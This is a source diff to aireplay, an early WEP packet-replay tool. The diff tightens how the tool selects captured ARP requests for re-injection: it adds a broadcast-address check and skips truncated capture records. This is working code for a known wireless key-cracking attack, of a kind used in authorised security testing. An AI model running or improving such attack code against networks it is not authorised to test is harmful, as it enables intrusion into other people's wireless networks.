@@ -37,10 +37,12 @@
 #define ETH_P_ALL 3
 #endif
 
+#define BROADCAST_ADDR "\xFF\xFF\xFF\xFF\xFF\xFF"
+
 char usage[] =
 
 "\n"
-"  aireplay 1.4 - (C) 2004 Christophe Devine\n"
+"  aireplay 2.0 - (C) 2004 Christophe Devine\n"
 "\n"
 "  usage: %s [options] <interface> <pcap filename>\n"
 "\n"
@@ -252,7 +254,10 @@ int main( int argc, char *argv[] )
         if( safe_read( infile, &pkh, n ) != n )
             break;
 
-        n = pkh.len;
+        if( pkh.len != pkh.caplen )
+            continue;
+
+        n = pkh.caplen;
 
         if( safe_read( infile, buffer, n ) != n )
             break;
@@ -284,10 +289,10 @@ int main( int argc, char *argv[] )
 
         switch( h80211[1] & 3 )
         {
-            case  0: i = 16; break;      /* DA, SA, BSSID  */
-            case  1: i =  4; break;      /* BSSID, SA, DA  */
-            case  2: i = 10; break;      /* DA, BSSID, SA  */
-            default: i =  4; break;      /* RA, TA, DA, SA */
+            case  0: i = 16; break;      /* DA, SA, (BSSID)  */
+            case  1: i =  4; break;      /* (BSSID), SA, DA  */
+            case  2: i = 10; break;      /* DA, (BSSID), SA  */
+            default: i =  4; break;      /* (RA), TA, DA, SA */
         }
 
         if( bssid_set == 0 )
@@ -314,9 +319,18 @@ int main( int argc, char *argv[] )
             if( ( h80211[27] >> 6 ) != keyid )
                 continue;
 
-        /* finally check the packet length */
+        /* finally check the packet length & broadcast address */
 
-        if( pkh.len + ( h80211[27] & 0x3F ) != 0x44 )
+        switch( h80211[1] & 3 )
+        {
+            case  0: i =  4; break;      /* (DA), SA, BSSID  */
+            case  1: i = 16; break;      /* BSSID, SA, (DA)  */
+            case  2: i =  4; break;      /* (DA), BSSID, SA  */
+            default: i = 16; break;      /* RA, TA, (DA), SA */
+        }
+
+        if( pkh.len + ( h80211[27] & 0x3F ) != 0x44 ||
+            memcmp( h80211 + i, BROADCAST_ADDR, 6 ) )
             continue;
 
         /* ok, this packet may be replayed */
@@ -339,7 +353,7 @@ int main( int argc, char *argv[] )
     }
 
     printf( "\r\33[1KRead %ld packets, got %ld "
-            "potential ARP packets.\n", cnt1, cnt2 );
+            "potential ARP requests.\n", cnt1, cnt2 );
 
     if( cnt2 == 0 )
         return( 1 );
